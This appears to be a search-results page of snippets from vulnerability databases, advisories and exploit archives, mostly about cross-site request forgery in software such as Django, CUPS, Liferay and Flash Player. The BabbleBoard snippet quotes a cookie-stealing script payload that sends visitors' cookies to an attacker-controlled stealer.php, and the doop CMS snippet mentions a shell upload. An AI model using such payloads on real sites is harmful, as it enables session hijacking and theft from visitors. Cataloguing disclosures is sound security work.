1836 matches found
D-Link CAPTCHA Bypass
D-Link Captcha Partially Broken May 12th, 2009 Hack-A-Day reported on D-Link’s new captcha system designed to protect against malware that alters DNS settings by logging in to the router using default administrative credentials. I downloaded the new firmware onto our DIR-628 to take a look, and...
doop CMS 1.4.0b - Cross-Site Request Forgery Arbitrary File Upload
doop CMS 1.4.0b - Cross-Site Request Forgery Arbitrary File Upload | Project: Doop document.admin.submit -- Upload Shell -- Ok. Once in the panel ...
BabbleBoard 1.1.6 - Cross-Site Request Forgery/Cookie Grabber
BabbleBoard v1.1.6 Cookie Grabber Exploit/CSRF + Discovered By SirGod + Greetz : All my friends + Cookie Grabber Exploit - Steal the cookie of any visitor. 1. Register as: document.location ="http://yourdomain/path/stealer.php?cookie=" + document.cookie; Everyone who visits the index page will be...
PT-2008-6327 · Apple · Cups
Name of the Vulnerable Software and Affected Versions: CUPS versions prior to 1.3.8 Description: The issue allows remote attackers to bypass intended policy and conduct CSRF attacks via the add and cancel RSS subscription functions in the web interface. This occurs because the web interface uses...
CVE-2008-3909
The administration application in Django 0.91, 0.95, and 0.96 stores unauthenticated HTTP POST requests and processes them after successful authentication occurs, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and delete or modify data via unspecified requests...
CSRF: Don't Underestimate My Damage and Attack Capability - Vulnerability Warning - the black bar safety net
Author: iceskysl Source: IceskYsl@1sters! CSRF as an attack technique was proposed long ago, back in 2006, but this sleeping giant of an attack has only recently come gradually into our line of sight. What is CSRF, and how much harm can it really do? What are the common ways to use it, how to,...
Liferay Portal fails to protect against CSRF
Overview: Liferay Portal fails to properly protect against Cross-Site Request Forgery (CSRF). This may allow a remote attacker to forge requests that Liferay Portal takes action upon. Description: Liferay Portal is an enterprise portal solution that uses Java technologies. Liferay Portal...
Critical: Red Hat Security Advisory: seamonkey security update
Updated seamonkey packages that fix several security issues are now available for Red Hat Enterprise Linux 2.1, 3, and 4. This update has been rated as having critical security impact by the Red Hat Security Response Team. SeaMonkey is an open source Web browser, advanced email and newsgroup...
Axis 207W Wireless Camera Web Interface - Multiple Vulnerabilities
http://airscanner.com/security/07080701axis.htm Airscanner Mobile Security Advisory 07080101: Axis 207W Multiple Vulnerabilities Product: AXIS 207W Platform: NA Requirements: AXIS 207W Camera on WLAN/LAN Credits: Seth Fogie Airscanner Mobile Security http://www.airscanner.com May 30, 2007 Risk...
CVE-2007-3787
The eSoft InstaGate EX2 UTM device does not require entry of the old password when changing the admin password, which might allow remote attackers to gain privileges by conducting a CSRF attack, making a password change from an unattended workstation, or other attacks...
CVE-2007-3457
Adobe Flash Player 8.0.34.0 and earlier insufficiently validates HTTP Referer headers, which might allow remote attackers to conduct a CSRF attack via a crafted SWF file...
Cross site request forgery (csrf)
Adobe Flash Player 8.0.34.0 and earlier insufficiently validates HTTP Referer headers, which might allow remote attackers to conduct a CSRF attack via a crafted SWF file...
CVE-2007-3464
Check Point SofaWare Safe@Office, with firmware before Embedded NGX 7.0.45 GA, does not require entry of the old password when changing the admin password, which might allow attackers to gain privileges by conducting a CSRF attack, making a password change on an unattended workstation, or other...
Cross site scripting
Cross-site scripting (XSS) vulnerability in the CSRF protection scheme in WordPress before 2.0.6 allows remote attackers to inject arbitrary web script or HTML via a CSRF attack with an invalid token and quote characters or HTML tags in URL variable names, which are not properly handled when...